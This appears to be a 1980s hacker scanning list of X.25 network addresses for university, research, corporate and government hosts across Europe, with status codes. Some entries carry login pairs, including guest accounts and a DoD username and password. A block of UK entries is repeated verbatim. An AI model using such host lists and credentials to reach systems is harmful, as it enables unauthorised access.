B 0228 468 114 0510*DME CERNME     CERN 1200 bps    OUTDIAL (where ???)
B 0228 468 114 0510*DHI            CERN ?
A 0228 468 114 0514                4.2 BSD UNIX (Mint)
A 0228 468 114 0515                Cern LS Group LAVC VXGIFT
A 0228 468 114 0520                Cern
A 0228 468 114 0532                Cern
A 0228 468 114 0533                L3 test beam VAX-750 VXC3
A 0228 468 114 0534                UXINFN
A 0228 468 114 0538                CS Group LAVC on node UXCOMS
A 0228 468 114 054                 Cern
A 0228 468 114 0545                Cern
A 0228 468 114 0551                VXCERN VMS 4.6
A 0228 468 114 0553                VXCERN VMS 4.6
A 0228 468 114 0556                VXCERN VMS 4.6
A 0228 468 114 0560                CERN VXNA31
A 0228 468 114 0561                CERN VXNA31
A 0228 468 114 0562                L3 VAX 11/750 VXC3MU
A 0228 468 114 0572                ISOLDES VAX 11/750
A 0228 468 114 0574                ? (Operator)
A 0228 468 114 0581                ?
A 0228 468 114 0583                %Merit:X.25 (Merit Computer Network, see
                                   appendix)
A 0228 468 114 0584                Develcon
A 0228 468 114 0587                ? (Operator)
A 0228 468 114 0588                ? (Operator)
A 0228 468 114 0589                ? (Operator)
A 0228 468 114 0592                Princeton University High Energy Physics
                                   Group Vax 11/750
A 0228 468 114 0593                University of Michigan Physics Vax 11/750
A 0228 468 114 0596                N.U. Physics Vax 11/750
A 0228 468 114 0597                Harvard University High Energy Physics Lab.
                                   Vax 8650
A 0228 468 114 0598                MIT-LNS*PIERRE
A 0228 468 114 0599                DoD, Distributed Databases Coordination
                                    Center (JMILLER,X0TF3AP)
D 0228 468 114 18                  BIOGEN (=GODEL?)
A 0228 468 114 23                  EDCHUB::
A 0228 469 110 02                  EPFL (something)
A 0228 469 110 0202                EPFL HELP
D 0228 469 110 0203                EPFL DE.VAX
D 0228 469 110 0204                EPFL GC.VAX
A 0228 469 110 0205                EPFL DP.VAX
A 0228 469 110 0206                EPFL ME.VAX
A 0228 469 110 0207                EPFL GR.VAX
A 0228 469 110 0208                EPFL MA.VAX
A 0228 469 110 0209                EPFL DI.VAX
D 0228 469 110 0210                EPFL IMAC.PDP
D 0228 469 110 0211                EPFL CGL.VAX
D 0228 469 110 0212                EPFL DE.MVAX
A 0228 469 110 0213                EPFL CC.VAX
A 0228 469 110 03                  EPFL Cyber 855
Ar0228 469 110 0301                EPFL Cyber
A 0228 475 110 02                  HSG St.Gallen
Ar0228 479 104 00                  Cern
A 0228 479 110 23                  I.P.Sharp (CA)
X 0228 479 110 86                  KOMETH (ETH ZH)
A 0228 479 110 650                 KOMETH (ETH ZH)
I 0228 479 111
A 0228 479 111 06                  GRS
I 0228 479 111 086
I 0228 479 111 11
I 0228 479 111 18                  ZEV-Mailbox Zuerich
A 0228 479 111 750                 ComNet (R-Nua)
A 0228 479 311 49                  KOMETH Output (ETH ZH)
A 0228 499 111 02001               KOMETH (Entry Uni)
  0228 9                           Radio-Suisse
  0232                  A          Austria
  0232 2                           Datex-P
O 0232 242 210 91
? 0232 242 211 42*DMAI             Sysnet Wien (Gast,Gast)
A 0232 252 310 000                 Uni Wien
  0232 9                           Radio Austri
A 0232 911 602 323                 Inpadoc
  0234                  GB         United Kingdom
  0234 1                IPSS       IPSS UK network
A 0234 110 020 02018               BT DIALCOM GROUP (PRESTEL ?)
  0234 2                           PSS
  0234 198 061 60                  Queen Marry C.
B 0234 207 920 002                 SWVA
  0234 211 920 100515              Hostess Doc.
  0234 212                         Dialnet
O 0234 212 080 105
I 0234 212 080 110      EPSONUK    Epson (UK)
A 0234 212 300 120      DIALNET    IGS Leased line to DIALOG in US
A 0234 212 300 12011    DIALNET    LRS-DIALOG 2   Dialog via London
Ar0234 212 300 12013    DIALMRC    LRS-Dialmail   (Reverse Charging)
A 0234 212 300 120*D@   DIALNET    IGS Leased line to DIALOG in US
A 0234 212 300 2920                GeoNet GEO2
B 0234 212 301 161                 OPTEL
  0234 212 301 186                 GEOSYSTEMS
  0234 212 301 187                 CAP GROUP LTD.
  0234 212 301 18722    CAP        CAP Industry Ltd.
  0234 212 301 281                 ONE TO ONE COMMS
O 0234 212 302 02192    PSSCLK     PSS Clock
B 0234 212 399 12013    DIALMAL    Dialmail via London
A 0234 212 900 115      STL        STL : ACER (BSD UNIX 4.2)
  0234 213 000 11
  0234 213 000 151      COMPUTAS   Computas Ltd
  0234 213 000 1511                COMPUTAS LTD.
D 0234 213 900 10150   ALVEY      Alvey Mail and FTP.
  0234 214 200 162      GLAXO      Galaxo Industries
  0234 214 400 12                  CONTROL DATA LTD.
  0234 215 000 11600    C3
  0234 215 710 104                 Consultans Ltd
  0234 216 700 127      PFIZER     Pfizer, SANDWICH
  0234 216 700 12701    PFIZER1    Pfizer, SANDWICH
  0234 216 700 12702    PFIZER2    Pfizer, SANDWICH
  0234 216 700 12703    PFIZER3    Pfizer, SANDWICH
  0234 216 700 12704    PFIZER4    Pfizer, SANDWICH
  0234 216 700 12706    PFIZER6    Pfizer, SANDWICH
  0234 218 801 00300               British Telecom Hotline
  0234 2                           PSS
  0234 198 061 60                  Queen Marry C.
B 0234 207 920 002                 SWVA
  0234 211 920 100515              Hostess Doc.
  0234 212                         Dialnet
O 0234 212 080 105
I 0234 212 080 110      EPSONUK    Epson (UK)
A 0234 212 300 120      DIALNET    IGS Leased line to DIALOG in US
A 0234 212 300 12011    DIALNET    LRS-DIALOG 2   Dialog via London
Ar0234 212 300 12013    DIALMRC    LRS-Dialmail   (Reverse Charging)
A 0234 212 300 120*D@   DIALNET    IGS Leased line to DIALOG in US
A 0234 212 300 2920                GeoNet GEO2
B 0234 212 301 161                 OPTEL
  0234 212 301 186                 GEOSYSTEMS
  0234 212 301 187                 CAP GROUP LTD.
  0234 212 301 18722    CAP        CAP Industry Ltd.
  0234 212 301 281                 ONE TO ONE COMMS
O 0234 212 302 02192    PSSCLK     PSS Clock
B 0234 212 399 12013    DIALMAL    Dialmail via London
A 0234 212 900 115      STL        STL : ACER (BSD UNIX 4.2)
  0234 213 000 11
  0234 213 000 151      COMPUTAS   Computas Ltd
  0234 213 000 1511                COMPUTAS LTD.
D 0234 213 900 10150   ALVEY      Alvey Mail and FTP.
  0234 214 200 162      GLAXO      Galaxo Industries
  0234 214 400 12                  CONTROL DATA LTD.
  0234 215 000 11600    C3
  0234 215 710 104                 Consultans Ltd
  0234 216 700 127      PFIZER     Pfizer, SANDWICH
  0234 216 700 12701    PFIZER1    Pfizer, SANDWICH
  0234 216 700 12702    PFIZER2    Pfizer, SANDWICH
  0234 216 700 12703    PFIZER3    Pfizer, SANDWICH
  0234 216 700 12704    PFIZER4    Pfizer, SANDWICH
  0234 216 700 12706    PFIZER6    Pfizer, SANDWICH
  0234 218 801 00300               British Telecom Hotline
  0234 219                         PSS-Network
  0234 219 200 001                 Network Monitoring Centre (NFS)
  0234 219 200 002                 Network Monitoring Centre (NFS)
  0234 219 200 100                 University of London Computing Centre
  0234 219 200 10069    JANETGW    PSS/JANET Gateway (ULCC)
B 0234 219 200 101                 Finsbury Data Service
  0234 219 200 1082                BING COMPUTER SERVICES (EUROPE) LTD.
A 0234 219 200 118      ADPUK      ADP NETWORK SERVICES LTD. (=AUTONET?)
  0234 219 200 118                 atomic energy research establishment
  0234 219 200 13370    QTLON      Quantime
A 0234 219 200 146      CEGB       CEGB, Park Street, London
B 0234 219 200 14869    ULCC       Univ. London Computer Centre (=JANET2?)
B 0234 219 200 14918    UCLMVAX    UCL Microvax ARPA Gateway
B 0234 219 200 14970
  0234 219 200 154                 UNILEVER COMPUTER SERVICES LTD.
A 0234 219 200 171      LEXIS      LEXIS
A 0234 219 200 190      INFOLINE   PERGAMON INFOLINE LTD. (NFS)
A 0234 219 200 203      IPSH       SHARP, I. P. ASSOCIATES LTD.
A 0234 219 200 220                 BRITISH LIBRARY ON-LINE SYSTEM
A 0234 219 200 222      BLAISE     British Library Information System
  0234 219 200 297                 RLFE & NOLAN COMPUTER SERVICES PLC
B 0234 219 200 300      UCL        University College London - Computer
  0234 219 200 300      UCLFTP     UCL (FTP)
A 0234 219 200 300      UCLMAIL    UCL (JNT Mail)
  0234 219 200 304                 University Computing Company (GB) Ltd.
B 0234 219 200 333      EUCLID     University College London  Computer Centre
  0234 219 200 394      CISI       CISI (=SIANET?;=Computer Services, London?)
  0234 219 200 871                 Instrument Rentals (UK) Ltd.
B 0234 219 201 002      POOLE
  0234 219 201 004      BGOLD81    Telecom BT-GOLD System 81
  0234 219 201 00472    BGOLD72    Telecom BT-GOLD System 72
  0234 219 201 00474    BGOLD74    Telecom BT-GOLD System 74
  0234 219 201 00479    BTGOLD     Telecom BT-GOLD System 79
  0234 219 201 00481    BTGOLDA    Telecom BT-GOLD System 81
  0234 219 201 00482    BTGOLD82   Telecom BT-GOLD System 82
  0234 219 201 00484    BGOLD84    Telecom Gold System 84
  0234 219 201 005      PSSMAIL    PSS TELE-MAIL service
B 0234 219 201 00513    DIANENQ    Euronet DIANE Enquiry Service
                                   (=Echo,Rutherford?)
B 0234 219 201 00513    EUROINFO   Euronet Diane Information Service
                                   (=Echo,Rutherford?)
A 0234 219 201 00515    BTDOC      BT Online Documentation Service
A 0234 219 201 00515    HOSTESS    Hostess system (BT)
  0234 219 201 00530    BAYNARD    BT Protocol Study Centre (NFS)
  0234 219 201 00615    PSSDOC     PSS documentation service/X25 technical
                                   info on line
  0234 219 201 00620    BTBILL     BT Online Billing
  0234 219 201 0100513
  0234 219 201 01013    HOSTESS    Hostess system (BT) (=PSS Switchstream 1 ?)
T 0234 219 201 01030    TSTB       British Telecom
  0234 219 201 025      PRESTEL    BT Prestel Service
  0234 219 201 02517
  0234 219 201 07800
  0234 219 201 15600    ESA1       ESA-IRS via London
  0234 219 201 18       ADPUK      ADP Network Services Ltd
  0234 219 210 050                 BT Mailbox facility (NFS)
  0234 219 511 31       GEC        GEC Computers Borehamwood
  0234 219 511 311      GECB       GEC Computers Ltd. Borehamwood
  0234 219 513 11       GECB       GEC Computers Ltd. Borehamwood
  0234 219 709 111                 Modular Computer Services Ltd. (MODCOMP)
? 0234 219 709 111      NPL1       National Physical Laboratory
  0234 219 709 210      NPL2       National Physical Laboratory, Protocol Std
                                   Group
B 0234 219 806 160      QMC        Queen Mary College London
X 0234 220 200 1070                island-Adventure-Game
X 0234 220 200 10700               island-Adventure-Game
  0234 220 641 141      ESSX       Essex, University of, Computing Service
                                   (2653,2653,Mist)
A 0234 220 641 1411                MUD (Adventure Game), <guest>, <mist> or
                                   <2653,2653>
B 0234 221 222 122      MIDB       MIDNET Gateway at Birmingham (=MIDBHM)
  0234 221 222 223      BIRP       Prime R & D at Birmingham
  0234 221 222 225                 Freight Comp. Services
  0234 222 236 163      CARDF      Cardiff, University College
  0234 222 236 16300    CARDIFF    Univ. Coll. Cardiff Multics
  0234 222 236 236      UWIST      University of Wales
  0234 222 300 16102    ACORN      Acorn Computers
  0234 222 339 399      CAMBRID    Cambridge University (Phoenix)
  0234 222 530 303      SWURCC     South-West Universities
  0234 222 530 30388    SWURCC     South-West Universities Network
  0234 222 530 30398    SWCFTP     SWURCC (FTP)
A 0234 222 715 151      KENT       University of Kent
X 0234 222 715 11                  ? (---,Guest,Friend (call PIP))
  0234 223 440          TI         Texas Instruments Ltd
  0234 223 440 144      BED5       Prime R & D at Bedford (NFS)
  0234 223 440 345      TI         Texas Instruments Ltd
  0234 223 500 10998    HLH        High Level Hardware Ltd.
B 0234 223 519 111      AERE       Atomic Energy Research Establishment at
                                   Harwell
T 0234 223 519 11198    ADA        ADA UK Database
  0234 223 519 119169              JANET
  0234 223 519 191      DLVAFTP    Daresbury SRS VAX (FTP)
A 0234 223 519 191      JANET      Gateway to JANET at Rutherford
  0234 223 519 191      OUCSFTP    OUCS VAX (FTP) - Experimental
  0234 223 519 191      REVSFTP    ROE Starlink VAX (FTP)
  0234 223 519 191      RLDAFTP    Rutherford DCS 11/70 (FTP)
  0234 223 519 191      RLGBFTP    RL GEC (FTP)
  0234 223 519 191      RLIBFTP    RL IBM 370 CMS (FTP)
  0234 223 519 191      RLPCFTP    L Prime C (FTP)
  0234 223 519 191      SERC       Gateway to SERCNET at Rutherford
  0234 223 519 191      SERCENQ    SERCNET Acc & P/word Fac.
  0234 223 519 191      SYPEFTP    Surrey Prime 550 (FTP)
  0234 223 519 191      UEAFTP     East Anglia via SERC (FTP)
  0234 223 519 191      ZUVSFTP    UCL Starlink VAX (FTP)
A 0234 223 519 19169    SERCNET    R/ford XXX SERCnet g/way
                                   (=DARESBURY,=JANET?)
? 0234 223 519 19169,.10404000     Lancaster Uni
B 0234 223 519 19169,.36           Oxford2
? 0234 223 519 19169,49000001
B 0234 223 519 19169,.50200014     Oxford
B 0234 223 519 19169,.CPVC         Omega VAX
A 0234 223 519 19169,.CPVD         Merlin VAX
B 0234 225 621 126      DECSS      DEC Software Support VAX (=BEANO?)
  0234 227 200 110                 GEAC 8000 ITI
  0234 227 200 112      HPLB       HPLB (Hewlett Packard Labs, Bristol)
  0234 227 230 230      BRST       University of Bristol
  0234 227 230 23000    BRISTOL    University of Bristol
  0234 227 230 231                 DLLON Comp. & Manag. Services Ltd.
  0234 227 230 301                 GAC Computers Ltd.
  0234 227 230 333      AVON       Avon Universities Computer Centre
  0234 227 230 33300    AUCC       Avon Universities Computer Centre
  0234 227 230 33398    AUCCFTP    AUCC (FTP)
B 0234 227 900 102      BLAISE     British Library Information System
  0234 227 900 10400    ESTELLE    STC Estelle
  0234 227 900 14302    ITT        ITT Harlow (=ALCATEL?)
  0234 231 300 101                 PRIME Office, Edinburgh
  0234 231 300 102                 Forestry Commission FTP
  0234 231 300 105      LATTLOG    Lattice Logic LTD
  0234 231 300 107
B 0234 231 354 354      ERCC       Edinburgh Regional Computer Centre
  0234 231 354 35419    BUSHFTP    RCO 2988 (FTP)
B 0234 231 354 35422    ERCC       ERCC - 2980, 2972 (EMAS) (=RCONET?)
  0234 232 500 124      EXIS       EXIS
I 0234 233 458 158      STAND      St. Andrews University VAX
B 0234 233 458 15898    STANFTP    St. Andrews Univ. (FTP)
  0234 234 417 117                 ICL at Bracknell
  0234 227 230 333                 ?
B 0234 239 232 323      EXETER1    Exeter University
  0234 239 232 32304    EXTR       University of Exeter
  0234 241 200 107
  0234 241 260 106      SCRSX      University of Strathcylde PDP-11/44 (RSX)
A 0234 241 260 10604               ? (,5020015,Birch/Bryan)
  0234 241 260 260      GLSG       University of Glasgow (NFS)
B 0234 241 260 26004               Glasgow
  0234 246 200 10243               ICL West Gorton 'B' Service
  0234 246 200 10248               ICL West Gorton 'X' Service
  0234 246 200 10277               ICL West Gorton Perq
  0234 246 240 240      ICLL       ICL at Letchworth (=Kidsgrove?) (NFS)
  0234 247 300 103                 MTIER Management Systems Ltd.
  0234 247 300 10300               Bridge, Switch
  0234 247 300 10340               Bridge, (VAX/VMS)
  0234 247 300 10345               Bridge, (MUX(VT100))
  0234 247 300 10346               Bridge
  0234 247 302 022      MHGA       LDC at Martlesham
  0234 248 300 106                 DWENT-SDC Search Service
  0234 248 321 321                 DWENT-SDC Search Service
B 0234 251 248 248      LIVE       University of Liverpool
  0234 252 724 241      BSL        BL Systems Ltd.
  0234 253 265 165      LEEDS      University of Leeds (NFS)
  0234 253 300 124      CAMTEC     Camtec, Leicester
  0234 253 300 12406    CAMTEC     Camtec, Leicester (hard copy printer)
  0234 258 200 106      ARC        Agricultural Research Council (GEC -
                                   Switch)
  0234 258 200 106      EMALFTP    East Malling (FTP)
  0234 258 200 106      RESFTP     RES (Rothampstead) - FTP
  0234 258 200 10604    AGRIFTP    AGRINET (CPSE) FTP
  0234 258 200 10604    AGRINET    AGRINET Gateway
  0234 258 200 10604    EASTMAL    East Malling
  0234 258 240 242      GECD       GEC Computers Ltd at Dunstable
  0234 258 240 24200    MRCA       GEC - Marconi Research Centre
B 0234 260 227 227      MIDN       MIDNET Gateway at Nottingham (University
                                   Leicester?) (=MIDNOT?)
B 0234 261 456 8383                Microlink
B 0234 261 600 119                 Manchester
  0234 261 600 133                 IBM - SALE (also FTP)
B 0234 261 600 152      UMDAFL     University of Manchester Dataflow VAX
  0234 261 643 143      UMRCC      University of Manchester Regional Computer
                                   Centre
  0234 261 643 14398    UMRFTP     UMRCC (FTP)
  0234 261 643 210      SALF       Salford University
  0234 261 643 21090    SALFORD    Salford -> GANNET
  0234 261 643 21090   NRS        NRS
B 0234 261 643 343      FERRANTI   Feranti Computer Systems
  0234 261 643 365                 ICLBRA
  0234 261 643 36543               ICL West Gorton 'B' Service
  0234 261 643 36548               ICL West Gorton 'X' Service
  0234 261 643 36577               ICL West Gorton Perq (also FTP)
  0234 262 500 484                 Software Sciences Ltd.
B 0234 262 800 151                 CDM/EH (=Maidenhead?)
  0234 262 800 43300
B 0234 263 259 159      NUMAC      University of Newcastle
  0234 264 200 136                 Primenet
B 0234 270 500 115                 MAXXIM
B 0234 270 500 142                 Farenham
T 0234 270 500 15                  Uni Brighton (GUEST,WELCOME)
  0234 270 712 217      HATF       Hatfield Polytechnic
  0234 273 417 171      DEC-RDG    Digital Equipment Ltd Reading
  0234 273 417 217      MODC       Modcomp
  0234 273 417 317      DECR       DEC at Reading
  0234 274 200 103                 SHEFFIELD, University of, Dept.of
                                   Electronic & Elec...
  0234 274 200 103*DCODUCODUS      Codus
  0234 274 253 385                 DVY Computing Ltd.
  0234 274 317 31
  0234 275 300 102                 GIS Ltd.
  0234 275 312 212      BOC        British Oxygen (=The World Reporter??)
  0234 275 312 212      DATASOLVE  as above
  0234 275 312 212      EUROLEX    British Oxygen Company
  0234 275 317 173                 Lynx Computers Ltd.
  0234 275 317 177                 TELEFILE Computer Services Ltd.
  0234 275 317 177      GSI        GSI (NFS)
  0234 278 228 282                 ICL Letchworth
  0234 278 228 288                 ICL Letchworth
  0234 284 400 108                 Culham, (VAX)
  0234 284 400 123      ALVEY      Alvey Electronic Mail
B 0234 289 500 109                 UXB
  0234 290 468 168      YORK       York University PSS Gateway
B 0234 290 468 168      YORKFTP    York University (FTP)
  0234 290 468 168                 Gateway To DEC-10 At York
  0234 290 468 16804    YORKTS     York TS29 Port
  0234 290 524 242      RSRE       Radio, Space Research Establishment
  0234 290 524 24203    RSREDL     RSRE
  0234 290 524 24204    RSRESNK    RSRE
  0234 290 524 24250   RSREA      Radio, Space Research Establishment for
                                   ALVEY mail
  0234 290 840 111      POLIS      SCION
  0234 290 840 111      SCICON     SCICON, South England
  0234 292 549 149      DL         SERC at Daresbury Laboratory
  0234 293 212 212                 DATASOLVE LTD.
  0234 293 212 212      BOC        British Oxygen Company (NFS)
D 0234 293 765          ARTTEL     British Library, Boston Spa
  0234 293 765 265                 British Library Lending Divi.
  0234 299 212 221      NOLTON     Nolton Communications Ltd. (NFS)
  0234 3                           Euronet
  0234 307 813          EUROINFO   Euronet Diane Information Service
  0234 8                TELEX      UK Telex network
  0234 892 992 0        DECTELX
I 0235 200 143 00165
  0238                  DK         Denmark
  0238 2                           Datapak
A 0238 241 592 400                 Valby I/S Datacentralen
A 0238 241 745 600      RECKU      Univac in Copenhagen University
  0238 241 745 60000               Recku Univac (Enter @@ENQ)
  0238 241 745 60002    UDIKU
A 0238 242 126 400                 Lyngby DTB; I/S Datacentralen
I 0238 389 3                       Euronet Aarhus
  0240                  S          Sweden
I 0240 181 559 76       LIUIDA S   Linkvping LiUIDA Teletex
  0240 2                           Datapak
A 0240 200 002 05                  Uppsala STUNS VAX/UNIX KULING
I 0240 200 044 4        ENEA       ENEA
A 0240 200 100 110                 Stockholm QZ/DEC-10
A 0240 200 100 120                 Stockholm QZ/CD Cyber 730
O 0240 200 100 203                 Uppsala, UU, Teknikum, NORD 100/500
A 0240 200 100 205                 Uppsala, UU, Stuns, VAX 750
A 0240 200 100 206                 Uppsala, UDAC/DECnet RTR18A
O 0240 200 100 207                 Uppsala, UDAC, Cyber 835
A 0240 200 100 228                 Uppsala, UDAC/UPNET - Terminalnaet
A 0240 200 100 232                 Uppsala, UDAC, IBM/GUTS (BASF 7/68 ?)
O 0240 200 100 28                  Uppsala Upnet
? 0240 200 100 30                  Umeaa VAX-750 Skogsh. Umeaa Univ
A 0240 200 100 303                 Umeaa, UMDAC/BIOVAX
A 0240 200 100 304                 Umeaa, Skogshoegskolan, VAX 750
A 0240 200 100 305                 Umeaa, UMDAC/DECnet RTR09A, (Vax 11/750)
A 0240 200 100 30520               Umeaa, UMDAC/BASUN
A 0240 200 100 30540               Umeaa, UMDAC/UTB1 (Vax 11/780)
A 0240 200 100 30550               Umeaa, UMDAC/UTB2 (Vax 11/750)
A 0240 200 100 30570               Umeaa, UMDAC/OSTVAX (Vax 11/780, Hoegsk i
                                   Oe-sund)
A 0240 200 100 307                 Umeaa, UMDAC/Cyber 850
D 0240 200 100 312                 Luleaa, Tekn hoegsk, NORD 100
D 0240 200 100 313                 Luleaa, Tekn hoegsk, NORD 100
A 0240 200 100 328                 Umeaa, UMDAC/NUNET - Terminalnaet
D 0240 200 100 33                  Umeaa VAX-11/780
A 0240 200 100 403                 Linkoeping, ULi/LIUIDA, uVAX-I
D 0240 200 100 404                 Linkoeping, ULi/PDP 11/23 BULL
A 0240 200 100 405                 Linkoeping, LIDAC, VAX 11/780 VIKTOR
A 0240 200 100 407                 Linkoeping, LIDAC/DECnet RTR13A, uVAX-II
D 0240 200 100 432                 Linkoeping, LIDAC/TEXAS - Terminalnaet
A 0240 200 100 7                   Primenet
A 0240 200 101 903                 Stockholm, SU, Psykologi, Prime 750
A 0240 200 101 904                 Stockholm, QZ IBM (Amdahl)
A 0240 200 101 905                 Stockholm, QZ, NFRVAX
A 0240 200 101 907                 Stockholm, QZ/DECnet RTR08A
A 0240 200 101 914                 Stockholm, SU, Fysik, Vax 780
D 0240 200 101 926                 Stockholm, KTH/KTHNET - Terminalnaet
A 0240 200 101 928                 Stockholm, QZ/QZNET - Terminalnaet
O 0240 200 102 06                  Uppsala UDAC uVAX-II RTR18A
O 0240 200 102 07                  Uppsala CD Cyber 835
A 0240 200 102 7                   Stockholm DEC-10/Janus
A 0240 200 102 71                  Stockholm DEC-10/Janus
A 0240 200 201 603                 Goeteborg, CTH, Infobeh, VAX 750, Unix
D 0240 200 201 604                 Goeteborg, GU, Pedagogiska inst, Prime 550
A 0240 200 201 605                 Goeteborg, GU, Statistiska inst, Prime 550
D 0240 200 201 606                 Goeteborg, CTH, Tillaempad Elektronik, VAX
                                   750
A 0240 200 201 607                 Goeteborg, Tillaempad Elektronik/DECnet
                                   RTR31A (RTR18A ?)
A 0240 200 201 628                 Goeteborg, GD/GUCNET - Terminalnaet
D 0240 200 201 632                 Goeteborg Upnod
A 0240 200 205 4                   SCB
A 0240 200 278 0                   Oerebro, Hoegskolan, Prime
A 0240 200 292 6                   Karlstad, Hoegskolan, VAX 11/780
D 0240 200 310 204                 Lund, Fysikum, NORD 500, Lucas
O 0240 200 310 206                 Lund, Maxlab, NORD 100
A 0240 200 310 207                 Lund, LDC/DECnet RTR46A, uVAX-II
A 0240 200 310 20720               Lund, LDC/GEMINI, Vax 8350
A 0240 200 310 228                 Lund, LDC/LUNET - Terminalnaet
  0240 201 001 30                  Stockholm QZ/Amdahl
  0240 201 002 03                  Uppsala Teknikum Nord 100/500
  0240 5                SWEDEN     Swedish data network (Telepak)
I 0240 500 025 3        QZXB       QZ by yet another route
I 0240 500 025 7                   Stockholm, DEC, VAX
I 0240 501 50                      Scannet, Goteborg
I 0240 501 51                      Scannet, Helsingfors
I 0240 501 52                      Stockholm KTH/TTDS
I 0240 501 531 0        QZCOM      QZ-COM - Stockholm University DEC-10
I 0240 501 532 0        QZCB       QZ Cyber
I 0240 501 533 0        QZIB       QZ Amdahl
I 0240 501 54           UPPS       Uppsala network, Sweden
I 0240 501 550 3                   Gottenburg, Sweden
I 0240 501 582 8        LUND       Lund University
I 0240 501 60                      Helsinki CP9500 HYLK B7800
I 0240 502 00                      Scannet, Stockholm
I 0240 502 01                      Denmark, Copenhagen Scannet
I 0240 502 02                      Tandem Computers
I 0240 502 032 8        QZXA       QZ Sweden via reverse PAD (=UPNET?)
I 0240 502 032 832                 Oden, Sweden
I 0240 502 033 2        QZDA       QZ DEC-10 Sweden
I 0240 502 04                      Prime Computers
I 0240 502 05                      Vaesteraas PAD ASEA Multics
I 0240 502 52                      KEMIDATA
I 0240 502 53           QZXB       QZ by yet another route
  0240 515 330                     Amdahl
  0242                  N          Norway
  0242 2                NORWAY     Norwegian data network (Datapak/Norpak)
  0242 192 010 1013                PSS DOC
X 0242 211 000 00107    OSLO       DEC-1099 DEC-net/PSI at Oslo University
D 0242 211 000 001*D02             Oslo univ BRU-nett UNINETT
D 0242 211 000 001*D03  OSLO       DEC-10 at Oslo University
D 0242 211 000 00100               Oslo univ DEC-1099 UNINETT
D 0242 211 000 002                 Oslo Scannet NSI Nord-100
D 0242 211 000 01018    DATAPIN    DATAPAK Info - Norway
B 0242 211 000 074                 Oslo VAX
T 0242 223 000 00151    RBK        Cyber 170 at IFE (Energy Research Centre)
T 0242 223 000 001*D00  RBK        Cyber 170 at IFE, Kjeller RBK UNINETT
D 0242 223 000 002                 Kjeller FFI UNINETT
D 0242 245 000 00101    BERGEN     Univac at Bergen University (UNINETT)
D 0242 245 000 001*D00  BERGEN     Univac at Bergen University
A 0242 245 013 4                   BBB Mailbox (Bergen By Byte)
  0242 253 000 001*D11             Trondheim UNINETT RUNIT UNIVAC
T 0242 253 000 00101    RNI        Univac at Trondheim University
X 0242 253 000 00103               Trondheim RUNIT UNINETT VAX-780 (=PUNIT
                                   (EANNET) ?)
T 0242 253 000 00104               Trondheim NLHT UNINETT VAX-750
  0242 265 000 001*D00             Tromso UNINETT U of Tromso, Cyber 171
  0242 253 000 001*D11  RUNIT      Univac at Trondheim University
  0242 265 000 001*D81             Tromso UNINETT U of Tromso, NORD-10
  0242 265 000 001*D82             Tromso UNINETT U of Tromso, NORD-100
  0242 265 000 001*D83             Tromso UNINETT U of Tromso, NORD-500
  0242 265 000 00101    TROMSOE    Cyber 170 at Tromsoe University (UNINETT)
  0242 265 000 001*D81  TROMSO     ELAN at Tromsoe University
X 0242 265 000 106                 PORTACOM (PORTACOM)
  0244                  SF         Finland
  0244 2                           Datapak (Finpak)
A 0244 202 006                     Economics HP 3000
A 0244 202 007                     University of Helsinki, B7800 (=CANDE ?)
A 0244 202 008                     VTKK (Staten DC) IBM 360
A 0244 202 012                     U o Helsinki Mopo Mikko3
A 0244 203 008          HELVA      High Energy Physics Vax 11/750
A 0244 203 017                     U of Technology DEC-20
D 0244 231 006                     Technical University of Tampere VAX
A 0244 253 001                     Tech U of Lappeenranta VAX/VMS
A 0244 261 001                     U of Vaasa VAX/VMS
A 0244 273 002                     University of Joensuu VAX
D 0248 321 321                     DWENT-SDC Search Service
  0262                  D          Germany
  0262 3                           Euronet
X 0262 307 4                       INFAS
  0262 4                GERMANY    German data network (Datex-P)
I 0262 428 462 10706
I 0262 428 479 11065
D 0262 432 210 43002               Apple
Ar0262 432 210 93001               Quick-Com
Y 0262 442 010 49132
O 0262 442 110 40325               OKI
Y 0262 442 110 49130               PAD Frankfurt
Y 0262 442 110 49133
Y 0262 442 110 49230
I 0262 442 151 40327               KIS (info)
I 0262 442 210 49331
A 0262 442 210 90371               elma-mailbox (~pim)
Y 0262 442 210 99632
O 0262 442 310 40312               Bibliothek  Chemie
I 0262 442 310 90306               Chemie
I 0262 442 410 40341    RMI        RMI Mailbox Aachen
I 0262 442 433 40307               CMES
O 0262 442 461 40343
Y 0262 443 000 49234
A 0262 443 000 90314               ?
Y 0262 443 000 99131
I 0262 444 000 90314               CCC Hamburg (Clinch), Hackerbox (1 line...)
Y 0262 444 000 90330               Allgemeine Bank der Niederlande
O 0262 444 000 90342               Batig Beteiligungen GmbH
A 0262 444 000 90374               Master Control System (MCS) Hamburg
Y 0262 444 000 99132
Y 0262 444 441 40317               Osnabrueck, Driverstr.24, 2848 Vechta
I 0262 445 110 30317               Metereologie
I 0262 445 110 90323               Bibliothek
I 0262 446 154 40371               DECATES - Oberramstadt
Y 0262 446 210 49330
Y 0262 446 810 49131
Y 0262 446 810 49132
O 0262 446 900 30331               IBD Online Frankfurt a.M.
I 0262 446 900 40318               Chemie
Y 0262 446 900 49231
Y 0262 446 900 49232
I 0262 446 900 90286               RZ
Y 0262 446 900 99133
O 0262 447 071 10303               Organische Chem.
Y 0262 447 110 49134
I 0262 447 114 9236                Emery
I 0262 447 127 90344
Y 0262 447 310 40313               Online-Literaturdok.
A 0262 447 531 40310               Chemie
I 0262 448 136                     Luma Uni
O 0262 448 136 90323               Genesys EDV-Systeme
Y 0262 448 210 49630
A 0262 448 900 30368               Phoenix
Y 0262 448 900 49130
A 0262 448 900 90313               Max Planck Institut
Y 0262 448 900 90341               LMU Bibliothek
Y 0262 448 900 99632
I 0262 449 310 90312               Apel Hans-Joerg
I 0262 452 000 21721               ???
I 0262 450 000 90184
I 0262 451 104 2301
O 0262 452 010 40116               AEG-Telefunken
I 0262 452 010 40179               RZ Uni Essen
I 0262 452 020 40120               Apotheke Dr.Schiemes
I 0262 452 080 40381               DVO Datenverarbeitung
I 0262 452 090 832                 ?
I 0262 452 101 30030               3M Mailbox
I 0262 452 101 40030               3M Mailbox
I 0262 452 110 40001               RZU Duesseldorf (ND100)
I 0262 452 110 40005               CIERR 1402
I 0262 452 110 40016               ADV-Orga-Meyer & Co.
I 0262 452 110 40018               ADV-Orga-Meyer & Co.
Ar0262 452 110 40026               Primenet Stadt Duesseldorf,
I 0262 452 110 40063               ADAC
I 0262 452 110 40080               Uni Duesseldorf
Dr0262 452 110 40099
D 0262 452 110 40105               RZU Duesseldorf (Siemens 7.570)
D 0262 452 110 40123               Data General
Ar0262 452 110 40130
Dr0262 452 110 40132
